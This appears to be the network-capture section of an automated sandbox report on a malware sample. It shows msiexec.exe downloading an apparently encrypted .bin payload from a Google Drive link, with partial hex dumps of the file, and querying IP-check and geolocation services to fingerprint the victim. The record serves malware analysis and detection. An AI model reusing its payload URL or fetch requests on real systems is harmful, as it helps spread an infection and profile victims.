                                                                                                                                                                                  4192.168.2.449768158.101.44.242808012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 16, 2024 18:29:07.228050947 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Dec 16, 2024 18:29:08.436230898 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:29:08 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: 3cce21803a6e7d35298182001f494616
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  5192.168.2.449779158.101.44.242808012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 16, 2024 18:29:10.267282963 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Dec 16, 2024 18:29:11.475013018 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:29:11 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: e8649791bb454324932d1de5d96bb7d0
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  6192.168.2.449787158.101.44.242808012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 16, 2024 18:29:13.298779011 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Dec 16, 2024 18:29:14.506438017 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:29:14 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: 1f8d9ffab43cf7e3bdd34f2233855ddf
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  7192.168.2.449797158.101.44.242808012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 16, 2024 18:29:16.551518917 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Dec 16, 2024 18:29:17.767580986 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:29:17 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  X-Request-ID: 73686b10e28dd1355924ee9bded3b4b3
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.2.449736172.217.19.1744438012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-16 17:28:43 UTC216OUTGET /uc?export=download&id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                  Host: drive.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2024-12-16 17:28:44 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:28:44 GMT
                                                                                                                                                                                  Location: https://drive.usercontent.google.com/download?id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO&export=download
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Content-Security-Policy: script-src 'nonce-u1j_x99rFhBLMGdLvlXsaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                  Connection: close


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  1192.168.2.449737142.250.181.14438012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-16 17:28:46 UTC258OUTGET /download?id=1YeXd9LJ-C_EeZ1qnzA6AhH9ENxjKxrEO&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Host: drive.usercontent.google.com
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-16 17:28:49 UTC4947INHTTP/1.1 200 OK
                                                                                                                                                                                  X-GUploader-UploadID: AFiumC44EnyHzDLYPW86pnQVTedAjxrEDpZaaHbRbZR9SbeoI4v9aRQP5NLDkQy7yoO03mKf
                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                  Content-Security-Policy: default-src 'none'
                                                                                                                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Content-Disposition: attachment; filename="digvjxGcgtYbtmKcYQiubAI104.bin"
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Content-Length: 277056
                                                                                                                                                                                  Last-Modified: Mon, 16 Dec 2024 09:14:07 GMT
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:28:49 GMT
                                                                                                                                                                                  Expires: Mon, 16 Dec 2024 17:28:49 GMT
                                                                                                                                                                                  Cache-Control: private, max-age=0
                                                                                                                                                                                  X-Goog-Hash: crc32c=/T2+IA==
                                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  2024-12-16 17:28:49 UTC4947INData Raw: af e1 74 84 d1 42 a2 05 81 24 59 55 c2 3c 16 3f bb 6b d9 4d 81 ea c3 52 12 39 bc 17 05 a1 c1 38 59 6f 54 32 19 77 4f bc 78 0e fe d5 d2 bb e0 ec ee 2f cf 0d cf b2 29 16 52 b7 dc 2b 81 4c 0d 5c b1 c1 fa c0 3c 3f 32 e1 e9 40 7d 7e 35 96 43 62 1e 79 ad 5f 56 3f 65 94 de fa 0a b7 98 cf ac 8b df 0e a1 ba 61 d2 33 3c 3a 66 03 4d 41 99 9d 3d 10 33 c2 b4 df c6 a6 21 c2 3e 8a 66 a7 8e b2 bf c8 c4 82 b3 4b b6 c1 6d b1 3a d7 ff a2 a8 3c 74 d4 4f 8c 6f 50 31 43 87 28 95 ac f7 a2 56 3b 97 8e db 8b 20 93 a5 8b 5a 3d fb 56 5f 5e 40 5e 99 75 e9 5a 3c 3c 92 70 c6 98 5f 71 5d 2d 47 43 49 51 7a 19 a7 65 44 0f 2e 0b f6 27 e1 c8 2a 63 47 ff 74 c9 31 3a 32 d5 d2 10 e3 ba 16 26 94 de 04 75 a1 64 cc 72 3e 6e 73 d9 8f fc ef 70 5c 6c be f8 cb 85 cf 39 97 0a 21 2e 25 41 da 63 b2 f8
                                                                                                                                                                                  Data Ascii: tB$YU<?kMR98YoT2wOx/)R+L\<?2@}~5Cby_V?ea3<:fMA=3!>fKm:<tOoP1C(V; Z=V_^@^uZ<<p_q]-GCIQzeD.'*cGt1:2&udr>nsp\l9!.%Ac
                                                                                                                                                                                  2024-12-16 17:28:49 UTC4800INData Raw: 70 a1 89 3c c1 09 95 3e 2e 02 13 2c e4 07 d3 41 8c b0 84 08 24 fe 68 cb f7 18 4a 02 bc a2 7e a6 02 ad 92 0a 11 06 eb 45 a8 e8 f4 c8 9a a7 ab 50 54 b7 db eb eb c3 d2 0b 73 62 68 60 e1 de 7c 88 07 12 75 05 5c e4 c1 0f 27 b4 38 8a 0a da e7 23 69 c6 b8 93 d6 31 1b 03 7e 8e 54 11 c9 58 36 35 01 89 99 b5 1d 25 46 2f e5 03 98 9b 6a ca 3f 38 2d f1 60 1f 7d 7e cb 06 26 62 a6 73 ad 58 51 50 03 94 9e f0 0d d8 ff cf ac 81 b0 66 a1 ba 6b de 33 4f 53 66 03 47 52 9d 9d 2c 14 3b d5 c7 b5 c6 a6 2b d1 3b 8a 77 22 fd d9 bf c6 d1 2b bb 5a 04 ca cf fc 82 d6 b9 6f 57 66 1c ac 3a 80 17 33 58 4b f4 49 f8 86 94 1f 29 51 97 97 fb e9 4f be 09 f0 34 0c 97 14 77 0b 0a 62 b8 18 86 34 59 ce 41 73 cc ad 5b 5d 55 3c 43 2c 48 01 3f 13 a7 f5 4c 24 40 d2 73 bd 8d 16 26 63 40 d3 73 ce 5e db
                                                                                                                                                                                  Data Ascii: p<>.,A$hJ~EPTsbh`|u\'8#i1~TX65%F/j?8-`}~&bsXQPfk3OSfGR,;+;w"+ZoWf:3XKI)QO4wb4YAs[]U<C,H?L$@s&c@s^
                                                                                                                                                                                  2024-12-16 17:28:49 UTC1327INData Raw: af af 17 83 43 ee 5f af 74 b9 dd cb 14 bf 77 3d c9 d6 b8 24 c2 8b f9 3d 3c b3 c1 cb 08 21 ff df ae fe 5c f6 69 30 84 7a 24 0a e2 34 8b 33 29 9d 0d 62 a6 93 09 2e 9a df a1 b1 85 8f 57 34 5f d1 06 26 13 a6 cc 38 24 25 c1 48 f7 e4 e6 37 11 2e 62 64 cf 10 3e 2f eb ff 46 5c 42 32 e0 e0 4d 26 95 7a 73 1c 11 d9 9f d2 c9 f3 f3 df 03 ae ac b9 57 b6 ff 6e de 80 68 bf 5e a6 7e eb 93 88 78 da 1c 68 76 43 7f 76 4d a6 b8 7e cd fd 0b 88 4f d7 56 ab 16 f4 c9 5a 07 63 2f 06 26 a7 9d 97 49 a5 a8 8b ca 04 7c 74 94 39 bf e3 99 57 1c bb 71 10 29 e6 a8 c9 db 6b 56 61 53 9e d5 67 92 fd e3 89 3c c0 76 83 4c 63 3a 12 5c 46 b3 c5 69 38 be 84 02 86 db 70 b9 90 15 4a 72 1e 2a 66 d8 3a b6 92 0e b3 eb f0 37 23 e9 f4 b8 38 82 b0 2e 7e b7 db ef 49 e7 ce 79 ea ba 69 10 43 2e 08 88 07 08
                                                                                                                                                                                  Data Ascii: C_tw=$=<!\i0z$43)b.W4_&8$%H7.bd>/F\B2M&zsWnh^~xhvCvM~OVZc/&I|t9Wq)kVaSg<vLc:\Fi8pJr*f:7#8.~IyiC.
                                                                                                                                                                                  2024-12-16 17:28:49 UTC1390INData Raw: 91 8f fc e7 e9 ce 3a e5 54 99 da 16 b6 a3 69 fe 18 d5 d2 43 f5 35 04 bf 35 0a ee 8a 29 1c fe 91 c6 b5 ce dd b2 25 8a fc 3d 51 a6 2b 9a c3 5d a1 76 1e fb 55 69 19 dc a6 19 e3 9e 1a f0 dd e0 a5 7a 94 f8 2b c1 09 c5 c3 13 d3 0c 3b 58 d3 ff 67 30 85 f5 8b f6 59 85 72 b1 0e 5b cf 7f b8 5c 83 9b 83 11 ce eb a1 54 aa 50 c7 92 ec 2d 25 e7 68 15 0b 0e 9e 46 b3 bf 1a 40 73 00 a9 be e5 07 83 98 0f 81 02 1f 92 bb 65 5f a0 4b 80 33 3c d5 02 6b 46 8f 2e db 95 4d ba 2c 5e b5 22 ba b3 d0 0b 6c a0 c6 f6 28 40 44 82 1e 80 23 bf a3 21 cb 11 6e de cc 32 19 94 24 4a b9 c0 c7 df 4a 5c 52 83 ef 1e 2e ae 4d 8b bf 70 c9 be 13 89 d1 32 a4 67 d9 9c 93 cb 71 7f 51 1c 06 a4 dc cb 18 6e 92 d0 b0 5d 78 ef 17 4d 52 a6 d1 f2 68 c9 14 59 66 c3 c0 5a 61 be c2 02 22 70 41 63 f1 06 1b 27 71
                                                                                                                                                                                  Data Ascii: :TiC55)%=Q+]vUiz+;Xg0Yr[\TP-%hF@se_K3<kF.M,^"l(@D#!n2$JJ\R.Mp2gqQn]xMRhYfZa"pAc'q
                                                                                                                                                                                  2024-12-16 17:28:49 UTC1390INData Raw: 11 09 3d 82 58 cd b7 94 89 6c 3e 78 42 ad 3e 59 50 73 fc 74 7c ef 6c ab 4e 9f c0 e5 68 35 05 00 ee 63 ff d1 10 38 30 9a 24 b7 1e 42 d7 d3 0b 76 06 ad 0d fc 4a f3 7b b1 07 76 50 08 35 87 85 28 ea 0d 46 89 e7 39 e9 56 4f c3 51 c0 1e 83 4f df 74 75 15 05 47 56 25 ba 9a b5 a0 28 c5 d0 7c d2 89 ae 14 df 42 de 9d e2 1a 61 66 e0 18 e6 85 64 7d 30 b6 04 22 87 b0 90 cb a9 7b d4 4e 42 c5 a3 a5 c0 76 8b 57 2d d9 a9 00 67 b1 2b f2 34 37 02 07 60 5e dd c9 dd c3 6d 34 73 ee 3b f4 3a 55 97 8f 50 36 a4 f8 12 3e 64 e2 fe 3a 3d 82 ad 00 aa 44 45 07 70 08 e6 7f 60 a1 0a 6a 42 38 6a e6 10 98 68 dc c5 ee 90 35 b8 fa 55 2e ca 23 26 85 f5 16 d9 2d d7 25 2d dd 27 31 22 cd 10 b9 c0 b7 07 b4 11 42 67 29 3c de fa 21 98 41 b4 8d 3c f5 72 1e 87 21 38 3a 2b 10 32 75 e1 4f 13 6d 3e 56
                                                                                                                                                                                  Data Ascii: =Xl>xB>YPst|lNh5c80$BvJ{vP5(F9VOQOtuGV%(|Bafd}0"{NBvW-g+47`^m4s;:UP6>d:=DEp`jB8jh5U.#&-%-'1"Bg)<!A<r!8:+2uOm>V
                                                                                                                                                                                  2024-12-16 17:28:49 UTC1390INData Raw: 40 a6 88 53 ff b8 00 55 42 51 52 ca ba 07 57 ac 6c 8a aa b5 df e6 c5 49 7e fd 54 9f ea f6 f8 60 2a 7e 0f 1e 4d b7 63 32 dd f5 3d a0 3d 33 10 de 38 ac b3 ed 41 c2 5f 14 d0 56 82 88 83 b9 f0 84 76 e5 35 13 6b c4 03 12 22 f4 93 f8 3f b1 5d 15 d5 dd 61 e9 eb 54 06 8e 9c 25 ff be f2 5f 06 5f cb 1d 1c d6 fc 7f e7 25 8a db 08 a1 58 f7 dc c1 a6 53 cd 65 34 8f e0 eb 03 c8 71 a1 fe 45 af d3 ec 73 48 25 64 ea 66 fa a4 56 a9 cc 47 67 61 43 cd 10 86 d7 48 73 6c 83 24 65 84 60 d9 e3 7c 25 54 ab 35 41 59 4d 9b 6d b3 d5 4f 1d 49 b5 0a 06 9a 48 e0 f7 01 e6 1e c4 22 79 42 5b 9e b7 ed 28 61 99 bf a0 40 6b 80 56 e4 e7 f3 d2 d6 c6 b6 97 fd cf 52 86 d2 d4 c3 9f f1 bd 46 27 2a 8a 62 3e 08 79 2f 3d f4 48 f7 e6 1e 40 0a 1f dd 8b ee b6 63 20 3c f0 d9 ad 93 82 fd 96 93 d9 49 5f 25
                                                                                                                                                                                  Data Ascii: @SUBQRWlI~T`*~Mc2==38A_Vv5k"?]aT%__%XSe4qEsH%dfVGgaCHsl$e`|%T5AYMmOIH"yB[(a@kVRF'*b>y/=H@c <I_%
                                                                                                                                                                                  2024-12-16 17:28:49 UTC1390INData Raw: ec 09 e7 41 99 27 80 19 75 2d d2 3e 13 dd cf 52 54 c5 97 2d 6a be 81 7d 5c df a9 8b c0 f4 66 e8 a9 ed fa 1d 60 03 df 18 8f 7a 27 54 25 ff a1 82 09 cc fb 76 55 3b 52 5a b9 b2 0c 64 06 9c d7 ed 2f 0e 9a df 70 9f 36 0c 98 3b 41 ce 9c 41 62 60 ef 76 43 31 ab 35 9b a4 23 f0 b1 fd ab 8e 0a 88 79 d0 75 71 ca d4 4c 59 ff 39 33 68 28 dc d4 a9 58 fd 28 dd 84 85 07 11 d8 e3 97 b9 b5 f0 a0 a6 54 21 47 e8 1a dd 3e 5e 4d dd 8d 57 6b 53 6e 58 09 ea 6a be 1d fc 0a 96 ba 99 a8 0f 62 8e f4 94 c0 91 58 47 df 8f 34 7c 83 1d 83 f5 5a a9 ee 24 f0 20 64 25 5c de 8d b6 82 bc 7d e9 98 d4 fe f8 ec c1 2d ee f9 00 81 38 77 f3 12 9a c5 c4 1a 42 11 89 19 42 d9 c2 40 81 ce 80 e9 54 5d d4 eb 8b bf 8f f1 af f7 8b ba 43 f9 e8 44 9e 60 3b 55 de 91 3a e3 36 b8 a2 a8 af 0f d0 b4 7c de c5 da
                                                                                                                                                                                  Data Ascii: A'u->RT-j}\f`z'T%vU;RZd/p6;AAb`vC15#yuqLY93h(X(T!G>^MWkSnXjbXG4|Z$ d%\}-8wBB@T]CD`;U:6|
                                                                                                                                                                                  2024-12-16 17:28:49 UTC1390INData Raw: a6 59 5c a1 d3 65 82 ad 8c 0b 73 bf 69 69 8e ac 7d 88 0d 02 ab 09 5c a8 ed 08 2f c0 09 89 0a 61 e7 ff b7 c6 9d bb f3 31 1b 21 0e 8a 54 33 a0 5f 1e 65 dc ea 95 b6 72 79 46 2f 91 5e fc 9b 6e b2 aa 3d 32 91 fb 68 fc 7e ca 63 55 9c a7 6a a8 4e 53 06 af 96 9e fa 74 98 98 cf a8 f9 ac 1e a1 ca 77 fa b2 3c 3a 6c 15 b3 40 8a 9b 2c 16 0a f2 b5 df c6 a6 35 3c 38 b7 66 27 88 c1 7f c6 db 32 95 8a 02 c8 aa 90 f1 14 b3 6f 83 7b 1b ac 3b d2 25 22 5e 20 86 8a f8 8c 9e ac fc 55 f8 f0 fb f8 42 dc 12 fe 34 17 ec 05 7f 1a 0b 62 7f 18 86 34 59 03 98 0f 55 ac 5f 01 75 99 47 43 43 73 90 09 a7 59 6d 57 2e d2 79 d8 40 c8 2a 69 47 ee 73 d4 bc 9a 32 d7 d2 3e f4 98 2d 30 b0 aa a6 50 a2 4c 78 72 3e 64 d1 c2 d4 8a 88 7f 7c 1c 1c dd b2 ff f7 39 97 4e 83 0b 1f 33 eb 60 b0 88 a4 4c ad df
                                                                                                                                                                                  Data Ascii: Y\esii}\/a1!T3_eryF/^n=2h~cUjNStw<:l@,5<8f'2o{;%"^ UB4b4YU_uGCCsYmW.y@*iGs2>-0PLxr>d|9N3`L
                                                                                                                                                                                  2024-12-16 17:28:49 UTC1390INData Raw: d1 4f 3a 1d 6a 16 9f 84 f8 f7 ce 57 fd 0e 5f 89 89 4b f6 ea fb dd a8 d0 05 dc 3b 1e 4c c2 7b 05 20 3e 89 7f 8c 7d 67 a1 67 30 6f b7 57 be 7a b9 80 cb 14 bf 64 c3 0c 48 dd 0c f6 8a dc 21 5d ef d6 e3 1a 83 da c2 5b 14 5a f6 63 92 a1 62 28 5f ed 34 ff e3 99 86 73 2a b0 bb 8c 8c bf cf c5 7e 87 9c 21 87 71 9d c5 24 19 b5 91 01 0c 53 c5 3a 8e f4 c6 47 0b 06 e3 4c b8 1a 28 db ea ec 3f 72 45 0b d4 f0 6f 54 ec 79 8d 6a 52 c6 9f d4 be 1b ba df 09 8c 7c 9a 29 fc ff 1d 18 a8 56 b5 4d a8 6f 3d fd 97 50 ee 18 1b bf 50 5b 7c 0a 00 b8 7e cd 23 1a 80 20 12 28 9c 1c 8a f0 28 92 65 40 b0 30 8f 16 97 58 a7 cc ec db 17 29 4d 05 15 e3 f4 66 b8 0c bb 00 1d 64 94 93 d5 b4 dc f4 44 4e b6 70 6f 8f 7a 01 ac 24 b3 34 9a 3e 5e 97 37 35 9a ae d2 41 88 1c a1 12 56 cf 6b cb 87 b8 6f 19
                                                                                                                                                                                  Data Ascii: O:jW_K;L{ >}gg0oWzdH!][Zcb(_4s*~!q$S:GL(?rEoTyjR|)VMo=PP[|~# ((e@0X)MfdDNpoz$4>^75AVko
                                                                                                                                                                                  2024-12-16 17:28:49 UTC1390INData Raw: 1c 9c cd 35 0d f0 02 e3 a2 e2 1b 27 27 80 2e 0e 61 55 4c 95 c9 3b fd 52 14 97 7c 7b 35 d4 15 2d ee 83 5b ff dd 9a 07 5f a4 8d 01 d0 18 d7 0e fc cf 7e a8 57 d3 9e d4 66 ce f5 8b f8 1e 12 72 b1 0e 27 22 64 35 16 83 8a 93 4a e2 99 52 42 d4 1b 65 b7 ff 76 2d e7 68 15 c6 e6 86 34 de b0 0b 21 c0 29 df 0e dd 07 89 9c bc a8 77 a2 a3 b8 6f 2f dc 73 d0 1b 08 df 11 43 43 b4 58 f3 f7 47 ba 06 80 b9 22 ba 9b a7 0b 12 9f c6 f6 52 0d d1 80 1a e1 14 e5 03 32 cb 6b 06 3f cd 21 09 ad 79 73 42 cb d6 fd 29 91 12 83 eb 37 35 b8 3f b6 a9 ae a9 39 1e aa f9 86 ae 74 f0 3e 9e b1 03 18 54 c2 76 06 f9 d2 18 61 92 d0 b0 8d c8 f7 65 0c 47 8e 20 50 4d d8 7c 87 67 d0 e0 e9 60 8e ec 58 b9 30 31 c1 d8 56 0d 55 36 fa c6 92 b8 7c bb aa 23 72 54 de 4a c9 82 78 6e fd 0e 5e 7a c9 d3 6a c2 44
                                                                                                                                                                                  Data Ascii: 5''.aUL;R|{5-[_~Wfr'"d5JRBev-h4!)wo/sCCXG"R2k?!ysB)75?9t>TvaeG PM|g`X01VU6|#rTJxn^zjD


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  2192.168.2.449739104.21.67.1524438012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-16 17:28:54 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-16 17:28:54 UTC878INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:28:54 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 358903
                                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
